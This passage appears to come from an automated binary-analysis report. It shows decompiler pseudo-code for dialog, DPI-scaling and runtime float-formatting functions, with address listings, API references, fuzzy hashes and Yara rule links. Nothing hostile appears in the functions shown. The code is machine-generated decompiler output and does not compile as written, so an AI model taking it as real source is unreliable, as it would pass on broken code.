                                                                                                                • Opcode Fuzzy Hash: 654c0358e1f6e62f79d7943643c73eb0cad8e58e60bc055ea8c4dcdb5887d191
                                                                                                                • Instruction Fuzzy Hash: 3E01287170020CAFCB11CF64FD64E527B94F714744F001226F606E2330C2358862FBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC11DA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00EC11DA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00EC46DC(0xf10b88, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00EC4703(0xf10b88, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xf26128(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xee7544);
								}
							}
						}
					}
				}
				return 0;
			}





                                                                                                                0x00ec11e1
                                                                                                                0x00ec1244
                                                                                                                0x00ec11e3
                                                                                                                0x00ec11e3
                                                                                                                0x00ec11ea
                                                                                                                0x00ec1200
                                                                                                                0x00ec1209
                                                                                                                0x00ec120e
                                                                                                                0x00ec1216
                                                                                                                0x00ec121e
                                                                                                                0x00ec1226
                                                                                                                0x00ec1234
                                                                                                                0x00ec1234
                                                                                                                0x00ec1226
                                                                                                                0x00ec1216
                                                                                                                0x00ec1209
                                                                                                                0x00ec11ea
                                                                                                                0x00ec124c

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC4703: _swprintf.LIBCMT ref: 00EC4729
                                                                                                                  • Part of subcall function 00EC4703: _strlen.LIBCMT ref: 00EC474A
                                                                                                                  • Part of subcall function 00EC4703: SetDlgItemTextW.USER32(?,00EF1044,?), ref: 00EC47AA
                                                                                                                  • Part of subcall function 00EC4703: GetWindowRect.USER32(?,?), ref: 00EC47E4
                                                                                                                  • Part of subcall function 00EC4703: GetClientRect.USER32(?,?), ref: 00EC47F0
                                                                                                                • GetDlgItem.USER32(00000000,00003021), ref: 00EC121E
                                                                                                                • SetWindowTextW.USER32(00000000,00EE7544), ref: 00EC1234
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                • String ID: 0$4*
                                                                                                                • API String ID: 2622349952-1177519819
                                                                                                                • Opcode ID: 065f68307adfeb4dafdef6d47581eae331f39f11faf128b26bd06460a54dad36
                                                                                                                • Instruction ID: da90c30980344d64c4169821adda22a0ec225b412f42c0a190a76eccd901dd91
                                                                                                                • Opcode Fuzzy Hash: 065f68307adfeb4dafdef6d47581eae331f39f11faf128b26bd06460a54dad36
                                                                                                                • Instruction Fuzzy Hash: CAF06D7810024CA6DF591F619A09FE93B9CAB0A308F046059BC85E50B2C776D4A6BA54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF0EC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E00ECF0EC(signed int _a4) {
				signed int _t4;
				signed int _t10;
				struct HDC__* _t13;

				if( *0xf0ca24 == 0) {
					_t13 = GetDC(0);
					if(_t13 != 0) {
						 *0xf0ca24 = GetDeviceCaps(_t13, 0x5a);
						ReleaseDC(0, _t13);
					}
				}
				_t4 =  *0xf0ca24; // 0x60
				_t10 = 0x60;
				asm("cdq");
				return _t4 * _a4 / _t10;
			}






                                                                                                                0x00ecf0f3
                                                                                                                0x00ecf0fe
                                                                                                                0x00ecf102
                                                                                                                0x00ecf110
                                                                                                                0x00ecf115
                                                                                                                0x00ecf115
                                                                                                                0x00ecf11b
                                                                                                                0x00ecf11c
                                                                                                                0x00ecf128
                                                                                                                0x00ecf129
                                                                                                                0x00ecf12c

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00ECF0F8
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ECF107
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00ECF115
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CapsDeviceRelease
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 127614599-1933750459
                                                                                                                • Opcode ID: d576730c4b723befdbf9e241c84f321d13c495cbf62e6a81149c3d1a120e9cab
                                                                                                                • Instruction ID: fd011ebb5833acdd5efea68dc988bc69ca331a350a344d3f060d4a47f2faba1a
                                                                                                                • Opcode Fuzzy Hash: d576730c4b723befdbf9e241c84f321d13c495cbf62e6a81149c3d1a120e9cab
                                                                                                                • Instruction Fuzzy Hash: 91E04F32643628EBD220DB54EE19F877FE5AB5DB12F005116F605EA1E1C7758801BA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF0A9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E00ECF0A9(signed int _a4) {
				signed int _t4;
				signed int _t10;
				struct HDC__* _t13;

				if( *0xf0ca20 == 0) {
					_t13 = GetDC(0);
					if(_t13 != 0) {
						 *0xf0ca20 = GetDeviceCaps(_t13, 0x58);
						ReleaseDC(0, _t13);
					}
				}
				_t4 =  *0xf0ca20; // 0x60
				_t10 = 0x60;
				asm("cdq");
				return _t4 * _a4 / _t10;
			}






                                                                                                                0x00ecf0b0
                                                                                                                0x00ecf0bb
                                                                                                                0x00ecf0bf
                                                                                                                0x00ecf0cd
                                                                                                                0x00ecf0d2
                                                                                                                0x00ecf0d2
                                                                                                                0x00ecf0d8
                                                                                                                0x00ecf0d9
                                                                                                                0x00ecf0e5
                                                                                                                0x00ecf0e6
                                                                                                                0x00ecf0e9

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00ECF0B5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ECF0C4
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00ECF0D2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CapsDeviceRelease
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 127614599-1933750459
                                                                                                                • Opcode ID: 9b4d6be902ffc19ca1b11fe3cbc5c14cff189af774be78a852b173a9e3ca28db
                                                                                                                • Instruction ID: 00ddd00ec1fdeca03d077fbfef1dbb7f86acf1d2418a2f5848cdf01aae60e26b
                                                                                                                • Opcode Fuzzy Hash: 9b4d6be902ffc19ca1b11fe3cbc5c14cff189af774be78a852b173a9e3ca28db
                                                                                                                • Instruction Fuzzy Hash: 41E04831642A2897D230C754DD1DF867F95BB58B12F005215F6069A5D0C7758415B7D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF16F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ECF16F() {
				int _t4;
				struct HDC__* _t9;

				_t9 = GetDC(0);
				_t4 = GetDeviceCaps(_t9, 0xc);
				ReleaseDC(0, _t9);
				return 0 | _t4 - 0x00000020 >= 0x00000000;
			}





                                                                                                                0x00ecf179
                                                                                                                0x00ecf17e
                                                                                                                0x00ecf189
                                                                                                                0x00ecf199

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00ECF173
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ECF17E
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00ECF189
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CapsDeviceRelease
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 127614599-1933750459
                                                                                                                • Opcode ID: 3bccaddaf4580a87612f6ee30cbf4b8b307c16f1ac98f23ee8c4dccd60c7bc2d
                                                                                                                • Instruction ID: 165751c96120ef332df6606c977cfcd7a683631b476bb2ab2913fef74ad9fc85
                                                                                                                • Opcode Fuzzy Hash: 3bccaddaf4580a87612f6ee30cbf4b8b307c16f1ac98f23ee8c4dccd60c7bc2d
                                                                                                                • Instruction Fuzzy Hash: 06D0C932642124ABE33067B9BC0EF8B3EA4DF8D671F060521F605CF1D4D9644887A6A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDE24E, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00EDE24E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00ED8DBE(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00EE6AC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00EE6AC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xed9a29
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00ED4440(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00EE6AC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00ED3760();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00ED3760();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00ED3760();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00EDE551(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00EE6BF0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00EDD9BD();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00EDD89C();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                                                                                0x00ede24e
                                                                                                                0x00ede259
                                                                                                                0x00ede260
                                                                                                                0x00ede262
                                                                                                                0x00ede262
                                                                                                                0x00ede264
                                                                                                                0x00ede26d
                                                                                                                0x00ede26f
                                                                                                                0x00ede274
                                                                                                                0x00ede27a
                                                                                                                0x00ede290
                                                                                                                0x00ede295
                                                                                                                0x00ede298
                                                                                                                0x00ede2a5
                                                                                                                0x00ede2aa
                                                                                                                0x00ede2fe
                                                                                                                0x00ede306
                                                                                                                0x00ede308
                                                                                                                0x00ede30a
                                                                                                                0x00ede30d
                                                                                                                0x00ede30d
                                                                                                                0x00ede30d
                                                                                                                0x00ede313
                                                                                                                0x00ede31b
                                                                                                                0x00ede32e
                                                                                                                0x00ede331
                                                                                                                0x00ede333
                                                                                                                0x00ede336
                                                                                                                0x00ede337
                                                                                                                0x00ede358
                                                                                                                0x00ede35b
                                                                                                                0x00ede35b
                                                                                                                0x00ede339
                                                                                                                0x00ede339
                                                                                                                0x00ede33b
                                                                                                                0x00ede346
                                                                                                                0x00ede346
                                                                                                                0x00ede348
                                                                                                                0x00ede34f
                                                                                                                0x00ede34a
                                                                                                                0x00ede34a
                                                                                                                0x00ede34a
                                                                                                                0x00ede348
                                                                                                                0x00ede35c
                                                                                                                0x00ede35e
                                                                                                                0x00ede35f
                                                                                                                0x00ede362
                                                                                                                0x00ede364
                                                                                                                0x00ede378
                                                                                                                0x00ede366
                                                                                                                0x00ede366
                                                                                                                0x00ede366
                                                                                                                0x00ede37d
                                                                                                                0x00ede37d
                                                                                                                0x00ede382
                                                                                                                0x00ede385
                                                                                                                0x00ede390
                                                                                                                0x00ede390
                                                                                                                0x00ede390
                                                                                                                0x00ede390
                                                                                                                0x00ede394
                                                                                                                0x00ede39b
                                                                                                                0x00ede39c
                                                                                                                0x00ede39f
                                                                                                                0x00ede3a2
                                                                                                                0x00ede3a2
                                                                                                                0x00ede3a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede3bc
                                                                                                                0x00ede3c3
                                                                                                                0x00ede3c7
                                                                                                                0x00ede3ca
                                                                                                                0x00ede3cd
                                                                                                                0x00ede3cf
                                                                                                                0x00ede3cf
                                                                                                                0x00ede3cf
                                                                                                                0x00ede3d1
                                                                                                                0x00ede3d4
                                                                                                                0x00ede3d7
                                                                                                                0x00ede3d9
                                                                                                                0x00ede3e1
                                                                                                                0x00ede3e7
                                                                                                                0x00ede3ea
                                                                                                                0x00ede3ed
                                                                                                                0x00ede3ee
                                                                                                                0x00ede3f1
                                                                                                                0x00ede3f4
                                                                                                                0x00ede3f4
                                                                                                                0x00ede3f9
                                                                                                                0x00ede3fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede414
                                                                                                                0x00ede419
                                                                                                                0x00ede41d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede421
                                                                                                                0x00ede421
                                                                                                                0x00ede424
                                                                                                                0x00ede425
                                                                                                                0x00ede425
                                                                                                                0x00ede427
                                                                                                                0x00ede42a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede42c
                                                                                                                0x00ede42f
                                                                                                                0x00ede436
                                                                                                                0x00ede439
                                                                                                                0x00ede43c
                                                                                                                0x00ede452
                                                                                                                0x00ede452
                                                                                                                0x00ede452
                                                                                                                0x00ede43e
                                                                                                                0x00ede43e
                                                                                                                0x00ede440
                                                                                                                0x00ede443
                                                                                                                0x00ede44e
                                                                                                                0x00ede445
                                                                                                                0x00ede448
                                                                                                                0x00ede448
                                                                                                                0x00ede443
                                                                                                                0x00000000
                                                                                                                0x00ede43c
                                                                                                                0x00ede431
                                                                                                                0x00ede431
                                                                                                                0x00ede433
                                                                                                                0x00ede433
                                                                                                                0x00ede387
                                                                                                                0x00ede387
                                                                                                                0x00ede38a
                                                                                                                0x00ede455
                                                                                                                0x00ede455
                                                                                                                0x00ede457
                                                                                                                0x00ede459
                                                                                                                0x00ede45c
                                                                                                                0x00ede45d
                                                                                                                0x00ede45e
                                                                                                                0x00ede45f
                                                                                                                0x00ede467
                                                                                                                0x00ede467
                                                                                                                0x00ede467
                                                                                                                0x00ede469
                                                                                                                0x00ede46c
                                                                                                                0x00ede46f
                                                                                                                0x00ede471
                                                                                                                0x00ede471
                                                                                                                0x00ede473
                                                                                                                0x00ede485
                                                                                                                0x00ede489
                                                                                                                0x00ede48c
                                                                                                                0x00ede493
                                                                                                                0x00ede49b
                                                                                                                0x00ede49b
                                                                                                                0x00ede49e
                                                                                                                0x00ede4a0
                                                                                                                0x00ede4b1
                                                                                                                0x00ede4b1
                                                                                                                0x00ede4b5
                                                                                                                0x00ede4b5
                                                                                                                0x00ede4b8
                                                                                                                0x00ede4ba
                                                                                                                0x00ede4bd
                                                                                                                0x00000000
                                                                                                                0x00ede4a2
                                                                                                                0x00ede4a2
                                                                                                                0x00ede4a8
                                                                                                                0x00ede4a8
                                                                                                                0x00ede4ac
                                                                                                                0x00ede4bf
                                                                                                                0x00ede4bf
                                                                                                                0x00ede4c3
                                                                                                                0x00ede4c4
                                                                                                                0x00ede4c6
                                                                                                                0x00ede4c8
                                                                                                                0x00ede509
                                                                                                                0x00ede509
                                                                                                                0x00ede50b
                                                                                                                0x00ede518
                                                                                                                0x00ede518
                                                                                                                0x00ede51a
                                                                                                                0x00ede51c
                                                                                                                0x00ede51d
                                                                                                                0x00ede51e
                                                                                                                0x00ede525
                                                                                                                0x00ede528
                                                                                                                0x00ede52a
                                                                                                                0x00ede52a
                                                                                                                0x00ede52b
                                                                                                                0x00ede52d
                                                                                                                0x00ede530
                                                                                                                0x00ede530
                                                                                                                0x00ede532
                                                                                                                0x00ede534
                                                                                                                0x00000000
                                                                                                                0x00ede534
                                                                                                                0x00ede50d
                                                                                                                0x00ede50f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede511
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede513
                                                                                                                0x00ede516
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede516
                                                                                                                0x00ede4cf
                                                                                                                0x00ede4d5
                                                                                                                0x00ede4d5
                                                                                                                0x00ede4d7
                                                                                                                0x00ede4d8
                                                                                                                0x00ede4d9
                                                                                                                0x00ede4da
                                                                                                                0x00ede4e1
                                                                                                                0x00ede4e4
                                                                                                                0x00ede4e6
                                                                                                                0x00ede4e7
                                                                                                                0x00ede4e9
                                                                                                                0x00ede4f6
                                                                                                                0x00ede4f6
                                                                                                                0x00ede4f8
                                                                                                                0x00ede4fa
                                                                                                                0x00ede4fb
                                                                                                                0x00ede4fc
                                                                                                                0x00ede503
                                                                                                                0x00ede506
                                                                                                                0x00ede508
                                                                                                                0x00ede508
                                                                                                                0x00000000
                                                                                                                0x00ede508
                                                                                                                0x00ede4eb
                                                                                                                0x00ede4eb
                                                                                                                0x00ede4ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede4ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede4f1
                                                                                                                0x00ede4f4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede4f4
                                                                                                                0x00ede4d1
                                                                                                                0x00ede4d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede4d3
                                                                                                                0x00ede4a4
                                                                                                                0x00ede4a6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede4a6
                                                                                                                0x00ede4a0
                                                                                                                0x00000000
                                                                                                                0x00ede38a
                                                                                                                0x00ede385
                                                                                                                0x00ede2ac
                                                                                                                0x00ede2ae
                                                                                                                0x00000000
                                                                                                                0x00ede2b0
                                                                                                                0x00ede2c6
                                                                                                                0x00ede2cb
                                                                                                                0x00ede2cd
                                                                                                                0x00ede2d9
                                                                                                                0x00ede2df
                                                                                                                0x00ede2e0
                                                                                                                0x00ede2e2
                                                                                                                0x00ede2e4
                                                                                                                0x00ede2ef
                                                                                                                0x00ede2ef
                                                                                                                0x00ede2f2
                                                                                                                0x00ede2f4
                                                                                                                0x00ede2f4
                                                                                                                0x00ede2f7
                                                                                                                0x00ede2cf
                                                                                                                0x00ede2cf
                                                                                                                0x00ede2cf
                                                                                                                0x00000000
                                                                                                                0x00ede2cd
                                                                                                                0x00ede27c
                                                                                                                0x00ede27c
                                                                                                                0x00ede283
                                                                                                                0x00ede284
                                                                                                                0x00ede286
                                                                                                                0x00ede538
                                                                                                                0x00ede53c
                                                                                                                0x00ede541
                                                                                                                0x00ede541
                                                                                                                0x00ede550
                                                                                                                0x00ede550

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
